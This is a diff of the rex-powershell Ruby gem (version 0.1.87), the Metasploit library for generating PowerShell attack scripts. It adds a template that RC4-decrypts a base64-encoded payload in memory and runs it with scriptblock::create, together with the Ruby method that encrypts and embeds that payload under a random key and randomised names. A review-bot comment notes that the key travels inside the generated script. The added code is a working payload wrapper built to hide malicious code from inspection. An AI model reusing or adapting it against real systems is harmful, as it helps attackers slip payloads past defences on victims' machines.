rex-powershell 0.1.86 → 0.1.87
- checksums.yaml +4 -4
- checksums.yaml.gz.sig +0 -0
- data.tar.gz.sig +0 -0
- data/data/templates/to_mem_rc4.ps1.template +40 -0
- data/lib/rex/powershell/payload.rb +22 -0
- data/lib/rex/powershell/version.rb +1 -1
- data/rex-powershell.gemspec +1 -0
- metadata +17 -2
- metadata.gz.sig +0 -0
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA256:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: 764fea22dc597fbfbf2af172ae81f6dccebf23d280d94683cd3220987565e567
|
4
|
+
data.tar.gz: df359a4703480f97a0353d840283099960fca5db2679cc67a812ffe0d7a8770b
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: e491690da3d3fc1d0c4be168b6029d612da06b5012d05f4f7ad9aea85aaa088d154ce37f499244b765072e60067c87a13b25c3d356e8313092602ca4416a5e06
|
7
|
+
data.tar.gz: e8b2607028adf09d185abf0c0833240c3232198c78f9ff928b0c8936ec4592c7c88a988c96bdaf8dac26da33ff1e6d510297283bf276e2bc2bdb0fb0af489a67
|
checksums.yaml.gz.sig
CHANGED
Binary file
|
data.tar.gz.sig
CHANGED
Binary file
|
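--- /dev/null
+++ b/data/data/templates/to_mem_rc4.ps1.template
@@ -0,0 +1,40 @@
+function %{func_rc4_decrypt} {
+param([Byte[]]$%{var_rc4buffer})
+
+$%{var_key} = ([system.Text.Encoding]::UTF8).GetBytes("%{random_key}")
+
+$s = New-Object Byte[] 256;
+$k = New-Object Byte[] 256;
+
+for ($i = 0; $i -lt 256; $i++)
+{
+$s[$i] = [Byte]$i;
+$k[$i] = $%{var_key}[$i %% $%{var_key}.Length];
+}
+
+$j = 0;
+for ($i = 0; $i -lt 256; $i++)
+{
+$j = ($j + $s[$i] + $k[$i]) %% 256;
+$temp = $s[$i];
+$s[$i] = $s[$j];
+$s[$j] = $temp;
+}
+
+$i = $j = 0;
+for ($x = 0; $x -lt $%{var_rc4buffer}.Length; $x++)
+{
+$i = ($i + 1) %% 256;
+$j = ($j + $s[$i]) %% 256;
+$temp = $s[$i];
+$s[$i] = $s[$j];
+$s[$j] = $temp;
+[int]$t = ($s[$i] + $s[$j]) %% 256;
+$%{var_rc4buffer}[$x] = $%{var_rc4buffer}[$x] -bxor $s[$t];
+}
+
+$%{var_rc4buffer}
+}
+
+&([scriptblock]::create(([system.Text.Encoding]::UTF8).GetString((%{func_rc4_decrypt} ([System.Convert]::FromBase64String("%{b64payload}"))))))
+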
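--- a/data/lib/rex/powershell/payload.rb
+++ b/data/lib/rex/powershell/payload.rb
@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 require 'rex/random_identifier'
+require 'rc4'
 
 module Rex
 module Powershell
@@ -106,6 +107,27 @@ module Payload
 read_replace_script_template(template_path, "to_mem_msil.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
 end
 
+#
+# PSH script that executes an RC4 encrypted payload with Invoke-Expression
+# by Adrian Vollmer (SySS GmbH, https://www.syss.de)
+#
+def self.to_win32pe_psh_rc4(template_path = TEMPLATE_DIR, code)
+rig = Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
+rig.init_var(:func_rc4_decrypt)
+rig.init_var(:var_rc4buffer)
+rig.init_var(:var_key)
+
+key = Rex::Text.rand_text_alpha(rand(8)+8)
+rc4 = RC4.new(key)
+enc_code = rc4.encrypt(code)
+
+hash_sub = rig.to_h
+hash_sub[:random_key] = key
+hash_sub[:b64payload] = Rex::Text.encode_base64(enc_code)
+
+read_replace_script_template(template_path, "to_mem_rc4.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
+end
+
 end
 end
 end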
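Review bot: The key from `Rex::Text.rand_text_alpha(rand(8)+8)` (new line 120) is substituted verbatim into a double-quoted PowerShell string literal in to_mem_rc4.ps1.template, so the alpha-only alphabet is load-bearing and nothing in the hunk records that; an alphabet containing `"`, `$` or a backtick would break or alter the generated script. A comment on that line such as `# alpha-only on purpose: the key is embedded in a double-quoted PowerShell string` would pin the constraint for the next maintainer. The header comment should also say that the key ships inside the emitted script, so the RC4 step is an encoding of the payload rather than a confidentiality control, to avoid the method being read as one. The spacing in `rand(8)+8` differs from the rest of the hunk; `rand(8..15)` states the intended range directly.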
data/rex-powershell.gemspec
CHANGED
metadata
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: rex-powershell
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 0.1.
|
4
|
+
version: 0.1.87
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
7
|
- David 'thelightcosine' Maloney
|
@@ -93,7 +93,7 @@ cert_chain:
|
|
93
93
|
JI/W23RbIRksG2pioMhd4dCXq3FLLlkOV1YfCwWixNB+iIhQPPZVaPNfgPhCn4Dt
|
94
94
|
DeGjje/qA4fkLtRmOtb9PUBq3ToRDE4=
|
95
95
|
-----END CERTIFICATE-----
|
96
|
-
date: 2020-02-
|
96
|
+
date: 2020-02-21 00:00:00.000000000 Z
|
97
97
|
dependencies:
|
98
98
|
- !ruby/object:Gem::Dependency
|
99
99
|
name: bundler
|
@@ -165,6 +165,20 @@ dependencies:
|
|
165
165
|
- - ">="
|
166
166
|
- !ruby/object:Gem::Version
|
167
167
|
version: '0'
|
168
|
+
- !ruby/object:Gem::Dependency
|
169
|
+
name: ruby-rc4
|
170
|
+
requirement: !ruby/object:Gem::Requirement
|
171
|
+
requirements:
|
172
|
+
- - ">="
|
173
|
+
- !ruby/object:Gem::Version
|
174
|
+
version: '0'
|
175
|
+
type: :runtime
|
176
|
+
prerelease: false
|
177
|
+
version_requirements: !ruby/object:Gem::Requirement
|
178
|
+
requirements:
|
179
|
+
- - ">="
|
180
|
+
- !ruby/object:Gem::Version
|
181
|
+
version: '0'
|
168
182
|
description: Ruby Exploitation(Rex) library for generating/manipulating Powershell
|
169
183
|
scripts
|
170
184
|
email:
|
@@ -185,6 +199,7 @@ files:
|
|
185
199
|
- data/templates/to_mem_msil.ps1.template
|
186
200
|
- data/templates/to_mem_old.ps1.template
|
187
201
|
- data/templates/to_mem_pshreflection.ps1.template
|
202
|
+
- data/templates/to_mem_rc4.ps1.template
|
188
203
|
- lib/rex/powershell.rb
|
189
204
|
- lib/rex/powershell/command.rb
|
190
205
|
- lib/rex/powershell/function.rb
|
metadata.gz.sig
CHANGED
Binary file
|